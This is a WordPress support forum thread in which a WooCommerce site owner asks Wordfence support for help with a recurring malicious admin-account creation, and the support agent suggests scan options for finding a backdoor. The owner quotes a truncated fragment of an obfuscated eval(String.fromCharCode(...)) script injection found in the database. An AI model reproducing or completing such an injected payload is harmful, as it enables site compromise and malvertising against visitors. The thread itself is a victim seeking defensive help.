Title: Admin User creating attack Last modified: October 23, 2019 --- # Admin User creating attack * [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-3/) * I am facing new admin user creation attack on one of my woocommerce site. The admin user are created with systemusers username and using [systemusers@gmailen.com](https://wordpress.org/support/topic/admin-user-creating-attack-3/systemusers@gmailen.com?output_format=md) as email address. After creating the user admin and user are getting new user created email notifications. Anyone here face this same problem before??how I can protect my site from this attack??? * When first time user created I found one vulnerable plugin on my site from wordfence scan I have deleted that plugin now and installed iTheme security pro version and enabled 2FA for admin users but after that still 5 times that user is creating on my site. * I found following code in Db eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, * bye checking this article * [https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/](https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/) * But on this article its saying wordfence is blocking these type of attack but after installing wordfence still creating new admin user on our site. Viewing 2 replies - 1 through 2 (of 2 total) * [WFSupport](https://wordpress.org/support/users/wfsupport/) * (@wfsupport) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-3/#post-12058105) * You might make sure the Scan Options to “Scan theme files against repository versions for changes” and “Scan plugin files against repository versions for changes” are enabled. Also “Scan files outside your WordPress installation”. They might have added a backdoor somewhere to allow access. * Tim * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-3/#post-12071361) * Hi, * I have done all scanning there is no outside files and malcius are not showing on our site. So how i can find out how they are creating new user ? Also how i can stop this new admin creation attack on my site? Viewing 2 replies - 1 through 2 (of 2 total) The topic ‘Admin User creating attack’ is closed to new replies. * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865) * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/) * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq) * [Support Threads](https://wordpress.org/support/plugin/wordfence/) * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/) * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/) * 2 replies * 2 participants * Last reply from: [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * Last activity: [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-3/#post-12071361) * Status: not resolved